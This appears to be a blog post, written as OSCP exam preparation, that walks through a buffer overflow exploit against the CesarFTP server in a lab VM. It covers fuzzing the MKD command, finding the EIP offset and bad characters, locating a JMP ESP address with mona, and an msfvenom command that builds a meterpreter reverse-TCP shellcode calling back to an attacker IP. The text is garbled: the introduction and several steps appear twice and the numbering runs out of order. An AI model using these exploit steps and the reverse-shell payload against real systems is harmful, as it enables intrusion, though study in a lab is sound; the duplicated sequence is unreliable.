version ภาษาไทย ไว้มีเวลาจะมา update ภายหลังครับ
Today I would like to review my old one lesson about buffer overflow before I take the OSCP exam in 2015. I wish you learn basic BOF from this post.
CesarFTP is the one ftp software which is vulnerabled to BOF (buffer overflow).
1. The first step I download vulnerabled software from internet and install on WinXP (vm) and then
2. Try to search for exploit in my kali linux (No, I don't exploit by metasploit just find the start code and try to make it overflow)
This original python 1906.py code is as picture below. I have to change "host" ip before do next step.
- use /usr/share/metasploit-framework/tools/pattern_offset.rb 41316141 and found that offset to EIP register is 3.
2. Check Bad char
- create bad character and paste into python code as
buffer = "MKD "
buffer += "\n" * 671
buffer += 'A' * 3 + 'B' * 4 + badchar
buffer += "\r\n"
and send it to overflow app again. Found that CesarFTP not crash. Let's identify bad char by cut over each character and found bad character are
0x00, 0x0a, 0x0d
remove all bad char and send it again.
3. Find location for PAYLOAD ( JMP ESP)
- use mona
!mona modules
!mona fiind -s "\xFF\xE4" -m user32.dll
- or click "e" and "m" to find library ( .dll )
in this case I find by this method and found 0x7E455313 is JMP ESP of USER32.dll
Today I would like to review my old one lesson about buffer overflow before I take the OSCP exam in 2015. I wish you learn basic BOF from this post.
CesarFTP is the one ftp software which is vulnerabled to BOF (buffer overflow).
1. The first step I download vulnerabled software from internet and install on WinXP (vm) and then
2. Try to search for exploit in my kali linux (No, I don't exploit by metasploit just find the start code and try to make it overflow)
This original python 1906.py code is as picture below. I have to change "host" ip before do next step.
***Let's take a look at "buffer". That is something I have to modify later.*** but right now I begin with Fuzzing to find how many characters can crash this application ?
3. Control EIP address
- try to replace character after "\n" * 671 by "A" 350 characters and found that Cesar not be crashed.
- Let's try to reduce "A" character to 340 and found that Cesar be crashed. I know the approximately space for shellcode.
- use /usr/share/metasploit-framework/tools/pattern_create.rb 340 and paste instead of "A" characters, then send again. I found EIP is overwritten by pattern "41316141"
- modify python code as below
buffer = "MKD "
buffer += "\n" * 671
buffer += 'A' * 3 + 'B' * 4 + 'C' * 333
buffer += "\r\n"
and send it again to prove EIP location
Ok. EIP is overwritten by '\x42' character. Right now I know location of EIP and size of payload is not over 333 bytes.
2. Check Bad char
- create bad character and paste into python code as
buffer = "MKD "
buffer += "\n" * 671
buffer += 'A' * 3 + 'B' * 4 + badchar
buffer += "\r\n"
and send it to overflow app again. Found that CesarFTP not crash. Let's identify bad char by cut over each character and found bad character are
0x00, 0x0a, 0x0d
remove all bad char and send it again.
ok. but actually in the end of exploit I found that "\xFF" is bad char too.
3. Find location for PAYLOAD ( JMP ESP)
- use mona
!mona modules
!mona fiind -s "\xFF\xE4" -m user32.dll
- or click "e" and "m" to find library ( .dll )
in this case I find by this method and found 0x7E455313 is JMP ESP of USER32.dll
I can overwrite EIP with JMP ESP
4. Generate shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.122 LPORT=4445 -f c -a x86 --platform windows -e x86/shikata_ga_nai -b '\x00\x0a\x0d\xff'
and paste shellcode into python script and fix code as ( I add "\x90" to reliable exploit)
buffer = "MKD "
buffer += "\n" * 671
buffer += 'A' * 3 + intel_order(EIP) + '\x90' * 7 + shellcode
buffer += "\r\n"
Comments
Post a Comment